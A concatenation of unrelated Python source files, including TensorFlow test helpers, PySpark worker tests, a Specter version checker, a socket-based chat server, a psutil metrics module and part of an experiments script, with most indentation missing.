assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
@contextlib.contextmanager
def _constrain_devices_and_set_default(self, sess, use_gpu, force_gpu):
"""Set the session and its graph to global default and constrain devices."""
if context.executing_eagerly():
yield None
else:
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or
# '/device:GPU:0' otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
def _create_session(self, graph, config, use_gpu, force_gpu):
"""See session() for details."""
if context.executing_eagerly():
return None
else:
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
if config is None:
config = config_pb2.ConfigProto()
config.allow_soft_placement = not force_gpu
config.gpu_options.per_process_gpu_memory_fraction = 0.3
elif force_gpu and config.allow_soft_placement:
# CopyFrom() returns None, so copy into a fresh proto instead of
# assigning its return value.
copied_config = config_pb2.ConfigProto()
copied_config.CopyFrom(config)
config = copied_config
config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
config.graph_options.rewrite_options.arithmetic_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
return ErrorLoggingSession(graph=graph, config=prepare_config(config))
@contextlib.contextmanager
def _get_cached_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False,
crash_if_inconsistent_args=True):
"""See cached_session() for documentation."""
if context.executing_eagerly():
yield None
else:
if self._cached_session is None:
sess = self._create_session(
graph=graph, config=config, use_gpu=use_gpu, force_gpu=force_gpu)
self._cached_session = sess
self._cached_graph = graph
self._cached_config = config
self._cached_use_gpu = use_gpu
self._cached_force_gpu = force_gpu
with self._constrain_devices_and_set_default(
sess, use_gpu, force_gpu) as constrained_sess:
yield constrained_sess
else:
if crash_if_inconsistent_args and self._cached_graph is not graph:
raise ValueError("The graph used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and self._cached_config is not config:
raise ValueError("The config used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and self._cached_use_gpu is not use_gpu:
raise ValueError(
"The use_gpu value used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and (self._cached_force_gpu is
not force_gpu):
raise ValueError(
"The force_gpu value used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
# If you modify this logic, make sure to modify it in _create_session
# as well.
sess = self._cached_session
with self._constrain_devices_and_set_default(
sess, use_gpu, force_gpu) as constrained_sess:
yield constrained_sess
@tf_export("test.create_local_cluster")
def create_local_cluster(num_workers,
num_ps,
protocol="grpc",
worker_config=None,
ps_config=None):
"""Create and start local servers and return the associated `Server` objects.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in
the documentation of `tf.train.Server`.
worker_config: (optional) ConfigProto to initialize workers. Can be used
to instantiate multiple devices etc.
ps_config: (optional) ConfigProto to initialize PS servers.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.train.Server` (all running locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
if _portpicker_import_error:
raise _portpicker_import_error # pylint: disable=raising-bad-type
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs,
job_name="worker",
protocol=protocol,
task_index=ix,
config=worker_config,
start=True) for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs,
job_name="ps",
protocol=protocol,
task_index=ix,
config=ps_config,
start=True) for ix in range(num_ps)
]
return workers, ps_servers
def get_node_def_from_graph(node_name, graph_def):
"""Returns the `NodeDef` instance for given node name in the graph def.
This method explores only the NodeDefs in `graph_def.node`.
Args:
node_name: Name of the NodeDef to search for.
graph_def: An instance of `GraphDef` proto.
Returns:
the `NodeDef` instance whose name field matches the given node_name or None.
"""
for node_def in graph_def.node:
if node_def.name == node_name:
return node_def
return None
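# Hedged usage sketch for get_node_def_from_graph(); the node name "my_const"
# is hypothetical and only illustrates the lookup.
def _example_node_lookup():
  g = ops.Graph()
  with g.as_default():
    ops.convert_to_tensor(1.0, name="my_const")
  return get_node_def_from_graph("my_const", g.as_graph_def())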
def set_producer_version(graph, producer_version):
"""Sets graph.graph_def_versions.producer to `producer_version`."""
# The C API doesn't expose altering GraphDefVersions. We can indirectly set
# it via import_graph_def though.
graph_def = graph_pb2.GraphDef()
graph_def.versions.producer = producer_version
with graph.as_default():
importer.import_graph_def(graph_def)
assert graph.graph_def_versions.producer == producer_version
|
test_worker.py
|
# -*- encoding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import tempfile
import threading
import time
import unittest
has_resource_module = True
try:
import resource # noqa: F401
except ImportError:
has_resource_module = False
from py4j.protocol import Py4JJavaError
from pyspark import SparkConf, SparkContext
from pyspark.testing.utils import ReusedPySparkTestCase, PySparkTestCase, QuietTest
class WorkerTests(ReusedPySparkTestCase):
def test_cancel_task(self):
temp = tempfile.NamedTemporaryFile(delete=True)
temp.close()
path = temp.name
def sleep(x):
import os
import time
with open(path, 'w') as f:
f.write("%d %d" % (os.getppid(), os.getpid()))
time.sleep(100)
# start job in background thread
def run():
try:
self.sc.parallelize(range(1), 1).foreach(sleep)
except Exception:
pass
import threading
t = threading.Thread(target=run)
t.daemon = True
t.start()
daemon_pid, worker_pid = 0, 0
cnt = 0
while True:
if os.path.exists(path):
with open(path) as f:
data = f.read().split(' ')
try:
daemon_pid, worker_pid = map(int, data)
except ValueError:
pass
# In case the value is not written yet.
cnt += 1
if cnt == 10:
raise
else:
break
time.sleep(1)
# cancel jobs
self.sc.cancelAllJobs()
t.join()
for i in range(50):
try:
os.kill(worker_pid, 0)
time.sleep(0.1)
except OSError:
break # worker was killed
else:
self.fail("worker has not been killed after 5 seconds")
try:
os.kill(daemon_pid, 0)
except OSError:
self.fail("daemon had been killed")
# run a normal job
rdd = self.sc.parallelize(range(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_after_exception(self):
def raise_exception(_):
raise RuntimeError()
rdd = self.sc.parallelize(range(100), 1)
with QuietTest(self.sc):
self.assertRaises(Py4JJavaError, lambda: rdd.foreach(raise_exception))
self.assertEqual(100, rdd.map(str).count())
def test_after_non_exception_error(self):
# SPARK-33339: PySpark application will hang due to a non-Exception error
def raise_system_exit(_):
raise SystemExit()
rdd = self.sc.parallelize(range(100), 1)
with QuietTest(self.sc):
self.assertRaises(Exception, lambda: rdd.foreach(raise_system_exit))
self.assertEqual(100, rdd.map(str).count())
def test_after_jvm_exception(self):
tempFile = tempfile.NamedTemporaryFile(delete=False)
tempFile.write(b"Hello World!")
tempFile.close()
data = self.sc.textFile(tempFile.name, 1)
filtered_data = data.filter(lambda x: True)
self.assertEqual(1, filtered_data.count())
os.unlink(tempFile.name)
with QuietTest(self.sc):
self.assertRaises(Exception, lambda: filtered_data.count())
rdd = self.sc.parallelize(range(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_accumulator_when_reuse_worker(self):
from pyspark.accumulators import INT_ACCUMULATOR_PARAM
acc1 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(range(100), 20).foreach(lambda x: acc1.add(x))
self.assertEqual(sum(range(100)), acc1.value)
acc2 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(range(100), 20).foreach(lambda x: acc2.add(x))
self.assertEqual(sum(range(100)), acc2.value)
self.assertEqual(sum(range(100)), acc1.value)
def test_reuse_worker_after_take(self):
rdd = self.sc.parallelize(range(100000), 1)
self.assertEqual(0, rdd.first())
def count():
try:
rdd.count()
except Exception:
pass
t = threading.Thread(target=count)
t.daemon = True
t.start()
t.join(5)
self.assertTrue(not t.is_alive())
self.assertEqual(100000, rdd.count())
def test_with_different_versions_of_python(self):
rdd = self.sc.parallelize(range(10))
rdd.count()
version = self.sc.pythonVer
self.sc.pythonVer = "2.0"
try:
with QuietTest(self.sc):
self.assertRaises(Py4JJavaError, lambda: rdd.count())
finally:
self.sc.pythonVer = version
def test_python_exception_non_hanging(self):
# SPARK-21045: exceptions with no ascii encoding shall not hang PySpark.
try:
def f():
raise RuntimeError("exception with 中 and \xd6\xd0")
self.sc.parallelize([1]).map(lambda x: f()).count()
except Py4JJavaError as e:
self.assertRegex(str(e), "exception with 中")
class WorkerReuseTest(PySparkTestCase):
def test_reuse_worker_of_parallelize_range(self):
rdd = self.sc.parallelize(range(20), 8)
previous_pids = rdd.map(lambda x: os.getpid()).collect()
current_pids = rdd.map(lambda x: os.getpid()).collect()
for pid in current_pids:
self.assertTrue(pid in previous_pids)
@unittest.skipIf(
not has_resource_module or sys.platform != 'linux',
"Memory limit feature in Python worker is dependent on "
"Python's 'resource' module on Linux; however, not found or not on Linux.")
class WorkerMemoryTest(unittest.TestCase):
def setUp(self):
class_name = self.__class__.__name__
conf = SparkConf().set("spark.executor.pyspark.memory", "2g")
self.sc = SparkContext('local[4]', class_name, conf=conf)
def test_memory_limit(self):
rdd = self.sc.parallelize(range(1), 1)
def getrlimit():
import resource
return resource.getrlimit(resource.RLIMIT_AS)
actual = rdd.map(lambda _: getrlimit()).collect()
self.assertTrue(len(actual) == 1)
self.assertTrue(len(actual[0]) == 2)
[(soft_limit, hard_limit)] = actual
self.assertEqual(soft_limit, 2 * 1024 * 1024 * 1024)
self.assertEqual(hard_limit, 2 * 1024 * 1024 * 1024)
def tearDown(self):
self.sc.stop()
class WorkerSegfaultTest(ReusedPySparkTestCase):
@classmethod
def conf(cls):
_conf = super(WorkerSegfaultTest, cls).conf()
_conf.set("spark.python.worker.faulthandler.enabled", "true")
return _conf
def test_python_segfault(self):
try:
def f():
import ctypes
ctypes.string_at(0)
self.sc.parallelize([1]).map(lambda x: f()).count()
except Py4JJavaError as e:
self.assertRegex(str(e), "Segmentation fault")
@unittest.skipIf(
"COVERAGE_PROCESS_START" in os.environ,
"Flaky with coverage enabled, skipping for now."
)
class WorkerSegfaultNonDaemonTest(WorkerSegfaultTest):
@classmethod
def conf(cls):
_conf = super(WorkerSegfaultNonDaemonTest, cls).conf()
_conf.set("spark.python.use.daemon", "false")
return _conf
if __name__ == "__main__":
import unittest
from pyspark.tests.test_worker import * # noqa: F401
try:
import xmlrunner # type: ignore[import]
testRunner = xmlrunner.XMLTestRunner(output='target/test-reports', verbosity=2)
except ImportError:
testRunner = None
unittest.main(testRunner=testRunner, verbosity=2)
|
version.py
|
import subprocess
import sys
import logging
import re
import threading
import time
import os
import requests
logger = logging.getLogger(__name__)
class VersionChecker:
def __init__(self, name="cryptoadvance.specter"):
self.name = name
self.current = "unknown"
self.latest = "unknown"
self.upgrade = False
self.running = False
def start(self):
if not self.running:
self.running = True
self.thread = threading.Thread(target=self.loop)
self.thread.daemon = True
self.thread.start()
def stop(self):
self.running = False
@property
def info(self):
return {
"current": self.current,
"latest": self.latest,
"upgrade": self.upgrade,
}
def loop(self, dt=3600):
"""Checks for updates every `dt` seconds (once per hour by default)"""
while self.running:
self.current, self.latest, self.upgrade = self.get_version_info()
logger.info(f"version checked. upgrade: {self.upgrade}")
time.sleep(dt)
def get_binary_version(self):
"""
Get binary version: current, latest.
Fails if version.txt is not present.
Returns latest = "unknown" if fetch failed.
"""
version_file = "version.txt"
if getattr(sys, 'frozen', False):
version_file = os.path.join(sys._MEIPASS, 'version.txt')
with open(version_file) as f:
current = f.read().strip()
try:
releases = requests.get("https://api.github.com/repos/cryptoadvance/specter-desktop/releases").json()
latest = "unknown"
for release in releases:
if release["prerelease"] or release["draft"]:
continue
latest = release["name"]
break
except:
latest = "unknown"
return current, latest
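# Note on the method below (an observation about the existing code, not part
# of the original comments): asking pip to install the non-existent version
# "random" makes pip print the full list of available releases in its error
# output; the last entry of that list is taken as the latest version, and the
# currently installed version is then read from `pip show`.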
def get_pip_version(self):
latest = str(subprocess.run([
sys.executable, '-m', 'pip',
'install', f'{self.name}==random'],
capture_output=True, text=True))
latest = latest[latest.find(
'(from versions:')+15:]
latest = latest[:latest.find(')')]
latest = latest.replace(' ', '').split(',')[-1]
current = str(subprocess.run([
sys.executable, '-m', 'pip',
'show', f'{self.name}'],
capture_output=True, text=True))
current = current[current.find(
'Version:')+8:]
current = current[:current.find(
'\\n')].replace(' ', '')
# master?
if current == 'vx.y.z-get-replaced-by-release-script':
current = 'custom'
# no need to check upgrades
self.running = False
return current, latest
def get_version_info(self):
'''
Returns a triple of the current version
of the pip-package cryptoadvance.specter and
the latest version and whether you should upgrade.
'''
# check if we have version.txt file
# this is the case for binaries
current = "unknown"
latest = "unknown"
# check binary version
try:
current, latest = self.get_binary_version()
# if file not found
except FileNotFoundError as exc:
try:
current, latest = self.get_pip_version()
except Exception as exc:
logger.error(exc)
# other exceptions
except Exception as exc:
logger.error(exc)
# check that both current and latest versions match the pattern
if (re.search(r"v?(\d+)\.(\d+)\.(\d+).*", current) and
re.search(r"v?(\d+)\.(\d+)\.(\d+).*", latest)):
return (
current,
latest,
# check without leading v so v1.2.3 = 1.2.3
latest.replace("v","") != current.replace("v","")
)
return current, latest, False
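# Hedged sketch of the upgrade decision made above: versions are compared as
# plain strings after stripping a leading "v", so "v1.2.3" equals "1.2.3" and
# any other mismatch is reported as an available upgrade.
def _example_upgrade_flag(current="v1.2.3", latest="v1.3.0"):
    return latest.replace("v", "") != current.replace("v", "")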
|
server.py
|
# Python 3.7
# Usage: python3 server.py server_port block_duration timeout
# coding: utf-8
import sys
from socket import *
from datetime import datetime
from threading import Timer, Condition, Thread
from helper import retrieve_components, decorate_chat_msg, is_existing_user, username2password
server_port = int(sys.argv[1])
block_duration = int(sys.argv[2])
timeout = int(sys.argv[3])
class User:
""" contains all the information about the online user """
def __init__(self, socket, address):
self.username = None
self.socket = socket
self.address = address
self.private_accepting_port = None
def __repr__(self):
return "User({}, {})".format(self.socket, self.address)
def get_username(self):
return self.username
def get_socket(self):
return self.socket
def get_address(self):
return self.address
def get_private_accepting_port(self):
return self.private_accepting_port
def set_username(self, username):
self.username = username
def set_private_accepting_port(self, port):
self.private_accepting_port = port
def send_prompt(self, prompt):
self.socket.send(prompt.encode())
def get_input(self):
message = self.socket.recv(2048)
return message.decode()
def create_thread(user_object):
""" create a separate thread for handling the interaction between the
server and each client
"""
thread = Thread(name="MainHandler", target=main_handler, args=[user_object])
thread.daemon = True
thread.start()
def is_online_user(username):
""" return True if 'username' is online """
return username in [user.get_username() for user in online_users]
def has_blocked(userA, userB):
""" return True if userA has blocked userB """
if userB in block_users:
if userA in block_users[userB]:
return True
else:
return False
else:
return False
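# Hedged sketch, with hypothetical data, of the mapping has_blocked() consults:
# block_users maps a user to the list of users who have blocked them, so if
# alice has blocked bob we expect has_blocked("alice", "bob") to be True.
def _example_block_lookup():
    block_map = {"bob": ["alice"]}  # stands in for the global block_users
    return "bob" in block_map and "alice" in block_map["bob"]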
def has_existing_connection(userA, userB):
""" return True if there's a private messaging session between userA and userB """
if userA in activeP2PSessions:
if userB in activeP2PSessions[userA]:
return True
if userB in activeP2PSessions:
if userA in activeP2PSessions[userB]:
return True
return False
def login_unblock(username):
""" unblock the user by removing the user from blocked_login
and clearing its record of unsuccessful login attempts
"""
del unSuccessfulAttempt[username]
del blocked_login[username]
def send_broadcast(user, message, typeOfMsg):
"""send broadcast to all online users that didn't block the sender
Parameters:
user (User): the user object
message (String): the message
typeOfMsg (int): 0 implies the message is a normal broadcast,
1 implies the message is a login/logout broadcast
"""
if typeOfMsg == 0:
get_blocked = False
for online_user in online_users:
if has_blocked(online_user.get_username(), user.get_username()):
get_blocked = True
continue
if user.get_username() == online_user.get_username():
continue
online_user.send_prompt(message)
if get_blocked:
user.send_prompt("Your message could not be delivered to some recipients")
elif typeOfMsg == 1:
for online_user in online_users:
# when A logs in/out, do not inform B if A has blocked B, and
# do not inform A itself
if has_blocked(user.get_username(), online_user.get_username())\
or user.get_username() == online_user.get_username():
continue
online_user.send_prompt(message)
def logout(user):
""" logout the user from the server, following operations are done
(1) send broadcast to notify users that user has logged out
(2) remove the user from the online users list
(3) record the user's last online time
(4) send message to the client application to confirm the log out
(5) remove the user's record from all active P2P sessions
(6) delete the user object
"""
send_broadcast(user, user.get_username() + " has logged out\n", 1)
for online_user in online_users:
if online_user.get_username() == user.get_username():
online_users.remove(online_user)
lastLoggedIn[online_user.get_username()] = datetime.now()
user.send_prompt("WhatsApp " + user.get_username() + " logout")
break
if user.get_username() in activeP2PSessions:
del activeP2PSessions[user.get_username()]
for activeuser in activeP2PSessions:
if user.get_username() in activeP2PSessions[activeuser]:
activeP2PSessions[activeuser].remove(user.get_username())
del user
def login_process(user):
""" handles all interactions between the server and the client while
the client is trying to log in
"""
while (1):
user.send_prompt("Username: ")
username = user.get_input()
if is_existing_user(username, username2password):
for _ in range(3):
user.send_prompt("Password: ")
password = user.get_input()
if is_online_user(username):
user.send_prompt("This account has logged in on another device.\n")
password = ""
break
elif username2password[username] == password:
if username in blocked_login:
user.send_prompt("Your account has been blocked. Please try again later.\n")
break
# delete user's unsuccessful login record if the password is
# correct
if username in unSuccessfulAttempt:
del unSuccessfulAttempt[username]
# set the name of the user and add it to the online_users list
user.set_username(username)
online_users.append(user)
send_broadcast(user, user.get_username() + " has logged in", 1)
break
else:
# user inputs wrong password
if username in unSuccessfulAttempt:
unSuccessfulAttempt[username] += 1
if unSuccessfulAttempt[username] >= 3:
if username not in blocked_login:
blocked_login[username] = Timer(block_duration, login_unblock, [username])
blocked_login[username].start()
user.send_prompt("Your account has been blocked. Please try again later.\n")
break
else:
unSuccessfulAttempt[username] = 1
user.send_prompt("Invalid Password. Please try again.\n")
else:
user.send_prompt("User doesn't exist\n")
continue
# user logs in successfully
if password == username2password[username] and username not in blocked_login:
user.send_prompt("Welcome back !\n")
# sends out all the cached offline messages to the client
if user.get_username() in offline_msg_box:
for msg in offline_msg_box[user.get_username()]:
user.send_prompt(msg)
del offline_msg_box[user.get_username()]
# try to get back the port number used by the client for accepting
# private connections
private = user.get_input()
private = private.split(' ')
user.set_private_accepting_port(private[1])
break
def main_process(user):
""" handle the command received from the client """
while (1):
t = Timer(timeout, logout, [user])
t.start()
command = user.get_input()
if command == "logout":
logout(user)
t.cancel()
break
elif command.startswith("message "):
userComponent, message = retrieve_components(command)
message = decorate_chat_msg(user.get_username(), message)
if userComponent == user.get_username():
user.send_prompt("Can't send message to yourself")
t.cancel()
continue
elif has_blocked(userComponent, user.get_username()):
user.send_prompt("Your message could not be delivered as the recipient has blocked you")
t.cancel()
continue
if is_existing_user(userComponent, username2password):
for online_user in online_users:
if online_user.get_username() == userComponent:
online_user.send_prompt(message)
break
# if the user is offline, add the message to the offline mail box
else:
message = message + '\n'
if userComponent in offline_msg_box:
offline_msg_box[userComponent].append(message)
else:
offline_msg_box[userComponent] = [message]
else:
user.send_prompt("Invalid user")
elif command.startswith("broadcast "):
message = retrieve_components(command)
message = decorate_chat_msg(user.get_username(), message)
send_broadcast(user, message, 0)
elif command == "whoelse":
prompt = "Online Users: "
for online_user in online_users:
if (online_user.get_username() != user.get_username()):
prompt = prompt + online_user.get_username() + ", "
prompt = prompt.rstrip(", ")
prompt += '\n'
user.send_prompt(prompt)
elif command.startswith("whoelsesince "):
time = int(retrieve_components(command))
# stores online users' name into a set
result = {online_user.get_username() for online_user in online_users}
for i in lastLoggedIn:
lastTime = lastLoggedIn[i]
now = datetime.now()
timeDelta = now - lastTime
                # add the user to the result set if it was last online
                # within the given number of seconds
                if timeDelta.total_seconds() < time:
result.add(i)
# removes the client itself from the result
if user.get_username() in result:
result.remove(user.get_username())
# construct the prompt
prompt = "Users: "
for i in result:
prompt = prompt + i + ", "
prompt = prompt.rstrip(", ")
prompt += '\n'
user.send_prompt(prompt)
elif command.startswith("block "):
userComponent = retrieve_components(command)
if userComponent not in username2password:
user.send_prompt("User is invalid")
t.cancel()
continue
elif userComponent == user.get_username():
user.send_prompt("Can't block yourself")
t.cancel()
continue
user.send_prompt("You have blocked " + userComponent)
if userComponent in block_users:
block_users[userComponent].add(user.get_username())
else:
block_users[userComponent] = {user.get_username()}
elif command.startswith("unblock "):
userComponent = retrieve_components(command)
if userComponent not in username2password:
user.send_prompt("Username is invalid")
elif userComponent == user.get_username():
user.send_prompt("Unblocking yourself is invalid")
elif userComponent in block_users and user.get_username() in block_users[userComponent]:
user.send_prompt("You have unblocked " + userComponent)
block_users[userComponent].remove(user.get_username())
else:
user.send_prompt("User " + userComponent + " is not in your block list")
elif command.startswith("startprivate "):
userComponent = retrieve_components(command)
if not is_existing_user(userComponent, username2password):
user.send_prompt("User doesn't exist")
t.cancel()
continue
elif has_existing_connection(user.get_username(), userComponent):
user.send_prompt("Can't establish private connection as current private connection with this user exists")
t.cancel()
continue
if userComponent != user.get_username():
for online_user in online_users:
if online_user.get_username() == userComponent:
if has_blocked(userComponent, user.get_username()):
user.send_prompt("Private message can't be established as you have been blocked")
else:
if user.get_username() not in activeP2PSessions:
activeP2PSessions[user.get_username()] = [online_user.get_username()]
else:
activeP2PSessions[user.get_username()].append(online_user.get_username())
online_user.send_prompt("WhatsApp " + online_user.get_username() + " allowprivate " + user.get_username())
user.send_prompt("WhatsApp " + user.get_username() + " startprivate " + str(online_user.get_address()) + " " + str(online_user.get_private_accepting_port()) + " " + online_user.get_username())
break
else:
user.send_prompt(userComponent + " is offline")
else:
user.send_prompt("Can't start private message with yourself")
elif command.startswith("stopprivate "):
userComponent = retrieve_components(command)
found = False
# check if there exists a private session between two users
if user.get_username() in activeP2PSessions:
if userComponent in activeP2PSessions[user.get_username()]:
activeP2PSessions[user.get_username()].remove(userComponent)
found = True
elif userComponent in activeP2PSessions:
if user.get_username() in activeP2PSessions[userComponent]:
activeP2PSessions[userComponent].remove(user.get_username())
found = True
# asks two users to discontinue their private connection if there's one between them
if found:
for online_user in online_users:
if online_user.get_username() == user.get_username():
online_user.send_prompt("WhatsApp stopprivate (1) " + userComponent)
elif online_user.get_username() == userComponent:
online_user.send_prompt("WhatsApp stopprivate (2) " + user.get_username())
else:
fail_message = "You don't have an active p2p session with " + userComponent
user.send_prompt(fail_message)
elif command == "WhatsApp sent private command":
t.cancel()
continue
else:
if user in online_users:
user.send_prompt("Invalid command")
else:
# user has been logged out by the server automatically after timeout
t.cancel()
break
t.cancel()
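# Commands understood by main_process, one per line from the client
# (argument layout inferred from the retrieve_components() calls above):
#   message <user> <text>        direct message, cached offline if the recipient is away
#   broadcast <text>             message every online user that hasn't blocked the sender
#   whoelse                      list the other users currently online
#   whoelsesince <seconds>       list users online within the last <seconds>
#   block <user> / unblock <user>
#   startprivate <user> / stopprivate <user>     open / close a p2p session
#   logout                       leave the server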
def main_handler(user_object):
""" all interactions between the server and the client, consists
of login process and main process
this function is called inside create_thread()
"""
global t_lock
login_process(user_object)
lastLoggedIn[user_object.get_username()] = datetime.now()
main_process(user_object)
t_lock = Condition()
# the number of unsuccessful attempts for each user
# stored in the format {user1: 3, user2: 2, ...}
unSuccessfulAttempt = {}
# users that are blocked for a period
blocked_login = {}
# user to user blocking
# here user1 is blocked by user2, user3, ...
# {user1: {user2, user3, ...}}
block_users = {}
# stores a list of online users.
online_users = []
# stores message in the format {user1:[msg1, msg2, ...], user2: [msg1, msg2, ...]}
offline_msg_box = {}
# saves the last online time for all users in the format {user1: time1, ...}
lastLoggedIn = {}
# saves active p2p messaging sessions user pairs
# if A initiates a p2p session with B, then {A: [B], ...}
activeP2PSessions = {}
# server's socket allowing clients to connect with
server_socket = socket(AF_INET, SOCK_STREAM)
server_socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
server_socket.bind(('localhost', server_port))
server_socket.listen(1)
while 1:
# creates a connection socket dedicated to this particular client
connectionSocket, clientAddress = server_socket.accept()
user = User(connectionSocket, clientAddress[0])
# create a separate thread for the client
create_thread(user)
server_socket.close()
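# --- manual test sketch (not part of the server) ----------------------------
# Minimal probe of the login exchange above, assuming the server is already
# running in another terminal on ('localhost', server_port).  The account
# name, password and port number below are placeholders, not real values.
#
#   from socket import socket, AF_INET, SOCK_STREAM
#   probe = socket(AF_INET, SOCK_STREAM)
#   probe.connect(('localhost', server_port))
#   print(probe.recv(1024))        # "Username: "
#   probe.sendall("alice")
#   print(probe.recv(1024))        # "Password: "
#   probe.sendall("secret")
#   probe.sendall("private 5001")  # port this client would accept p2p connections on
#   probe.sendall("whoelse")       # then read the reply with probe.recv(1024)
#   probe.close()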
|
performance_metrics.py
|
from os import environ
import psutil, threading, hashlib
# note: setting PYTHONHASHSEED at runtime only affects child processes
# spawned afterwards; it does not re-seed the already-running interpreter
environ["PYTHONHASHSEED"] = '1234'
def ratio(before, after):
    """ percentage reduction from `before` to `after` """
    return 100 * (1 - (after / before))
# def integrity(before, after):
# md5_before = None
# md5_after = None
# # Open,close, read file and calculate MD5 on its contents
# with open(before) as file_to_check:
# # read contents of the file
# data = file_to_check.read()
# # pipe contents of the file through
# md5_before = hashlib.md5(data.encode("utf8")).hexdigest()
# with open(after) as file_to_check:
# # read contents of the file
# data = file_to_check.read()
# # pipe contents of the file through
# md5_after = hashlib.md5(data.encode("utf8")).hexdigest()
# # Finally compare original MD5 with freshly calculated
# if md5_before == md5_after:
# print("MD5 verified.")
# else:
# print("MD5 verification failed!.")
def integrity(filename):
md5 = hashlib.md5()
    # open the file and update the MD5 hash in 4 KiB blocks
    with open(filename, "rb") as file_to_check:
        for block in iter(lambda: file_to_check.read(4096), b''):
md5.update(block)
return md5.hexdigest()
def performance_metrics():
    """ sample this process's CPU and memory usage once per second
        until stop() sets `running` to False
    """
    global running
global cpu_usage
global memory_usage
cpu_usage = []
memory_usage = []
running = True
current_process = psutil.Process()
# start loop
while running:
cpu_usage.append(current_process.cpu_percent(interval = 1))
memory_usage.append(current_process.memory_percent())
def performance_metrics_system_wide():
global running
global cpu_usage
global memory_usage
cpu_usage = []
memory_usage = []
running = True
before_cpu_usage = psutil.cpu_percent()
before_memory_usage = psutil.virtual_memory().percent
# start loop
while running:
cpu_usage.append(abs(psutil.cpu_percent(interval = 1)-before_cpu_usage))
memory_usage.append(abs(psutil.virtual_memory().percent - before_memory_usage))
def start():
global t
# create thread and start it
t = threading.Thread(target = performance_metrics)
t.start()
def start_system_wide():
global t
# create thread and start it
t = threading.Thread(target = performance_metrics_system_wide)
t.start()
def stop():
global running
global cpu_usage
global memory_usage
global t
result = []
result.append(cpu_usage)
result.append(memory_usage)
# use `running` to stop loop in thread so thread will end
running = False
# wait for thread's end
t.join()
return result
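# usage sketch (assumption: this module is normally imported by a benchmark
# script; the sleep below merely stands in for the real workload being measured):
if __name__ == '__main__':
    import time
    start()                                  # sample this process once per second
    time.sleep(3)                            # placeholder workload
    cpu_samples, mem_samples = stop()
    print("avg cpu %%: %.2f" % (sum(cpu_samples) / max(len(cpu_samples), 1)))
    print("avg mem %%: %.2f" % (sum(mem_samples) / max(len(mem_samples), 1)))
    print("space saving: %.1f%%" % ratio(1000.0, 250.0))   # -> 75.0
    # integrity("some/file") would return that file's MD5 hex digest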
|
experiments.py
|
from bokeh.io import export_png, output_file, show
def _get_return(function, x, y, return_var):
return_var.append(function(x, elapsed_time=y))
from tnetwork.DCD.analytics.dynamic_partition import *
from nf1 import NF1
from sklearn.metrics import adjusted_rand_score, normalized_mutual_info_score
import pandas as pd
import numpy as np
import tnetwork as tn
from tnetwork.DCD.externals.dynamo import dynamo
from tnetwork.DCD.externals.dynmoga import dynmoga
from tnetwork.DCD.externals.MuchaOriginal import transversal_network_mucha_original
from matlab import engine
def standard_methods_to_test():
eng = engine.start_matlab()
def smoothed_louvain(x, elapsed_time=True):
return tn.DCD.iterative_match(x, CDalgo="smoothedLouvain", elapsed_time=elapsed_time)
# methods_to_test = {"iterative":DCD.iterative_match,"dynamo":dynamo,"dynmoga":dynmoga,"smoothed_louvain":smoothed_louvain}
def mucha_opti(x, elapsed_time=True):
return transversal_network_mucha_original(x, elapsed_time=elapsed_time, matlab_session=eng)
def mucha_global(x, elapsed_time=True):
return transversal_network_mucha_original(x, elapsed_time=elapsed_time, matlab_session=eng, form="global")
print("pas de mucha")
methods_to_test = {"iterative": tn.DCD.iterative_match,
"dynamo": dynamo,
"smoothed_louvain": smoothed_louvain,
